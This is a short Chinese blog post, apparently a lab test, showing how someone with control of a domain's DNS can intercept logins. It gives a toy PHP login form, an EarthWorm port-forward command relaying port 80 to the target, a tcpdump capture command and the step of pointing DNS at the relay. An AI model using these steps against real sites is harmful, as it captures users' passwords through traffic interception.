拿到域名解析权限后
由于自己的域名…出了点问题,就先将就的测试一下
实验环境:
两台vps,一台用于需要攻击的靶机,一台用于中间监听
1、靶机上的登陆页面:
<?php
error_reporting(E_ALL);
if(isset($_POST['p'])){
if($_POST['p'] == "lemon"){
echo "login ok";
}else{
echo "login error";
}
}
?>
<form action="" method="post">
<input type="text" name="p" value="">
<input type="submit" value="login">
</form>
2、中间监听的vps
现在在中间端口转发一下
./ew_for_linux64 -s lcx_tran -l 80 -f 靶机ip -g 80
然后抓取一下流量
tcpdump tcp -i eth1 -t -s 0 -w ./test.cap
最后的是将域名解析改到这个监听的vps上
know it then do it
【推荐】2025 HarmonyOS 鸿蒙创新赛正式启动,百万大奖等你挑战
【推荐】博客园的心动:当一群程序员决定开源共建一个真诚相亲平台
【推荐】开源 Linux 服务器运维管理面板 1Panel V2 版本正式发布
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 在 .NET 中使用内存映射文件构建高性能的进程间通信队列
· 一个 java 空指针异常的解决过程
· 揭开 SQL Server 和 PostgreSQL 填充因子的神秘面纱
· 没有调度器的协程不是好协程,零基础深入浅出 C++20 协程
· 别做抢活的导演:代码中的抽象层次原则
· 今年失业的程序员兄弟姐妹们,你们都去干什么了?
· TinyEditor v4.0 alpha 版本发布:表格更强大,表情更丰富,上传体验超乎想象!
· .NET周刊【7月第2期 2025-07-13】
· 圆方树学习笔记 —— 一种关于点双连通分量的思考方式
· MySQL 17 如何正确地显示随机消息?